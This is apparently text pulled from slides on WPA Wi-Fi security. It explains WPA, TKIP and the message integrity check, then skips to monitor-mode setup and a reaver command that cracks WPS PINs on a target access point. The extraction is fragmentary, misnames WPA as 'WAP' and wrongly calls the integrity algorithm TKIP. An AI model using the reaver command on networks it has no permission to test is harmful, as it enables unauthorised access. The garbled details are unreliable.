4. Wifi Protected Access (WAP)
Is security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks.
The Alliance defined these in response to serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP).

5. The WPA protocol implements much of the IEEE 802. 11i standard
The WPA protocol implements much of the IEEE i standard. Specifically, the Temporal Key Integrity Protocol (TKIP) was adopted for WPA
WEP used a 64-bit or 128-bit encryption key that must be manually entered on wireless access points and devices and does not change
TKIP employs a per-packet key, meaning that it dynamically generates a new 128-bit key for each packet and thus prevents the types of attacks that compromised WEP

6. Features in WAP :
includes a message integrity check : which is designed to prevent an attacker from altering and resending data packets
This replaces the cyclic redundancy check(CRC) that was used by the WEP standard.
WPA uses a message integrity check algorithm called TKIP to verify the integrity of the packets.
TKIP is much stronger than a CRC, but not as strong as the algorithm used in WPA2 .

 it created a monitor mode interface called wlan0mon and it notified there are a few process that will interfere with the tools

Display a list of detected access points, and also a list of connected clients (“stations”)

13. reaver –i wlan0mon –b <BSSID of target> -vv –K 1
This command can perform brute force password attacks and can also recover PINs for the WPA/WPA2 security algorithms
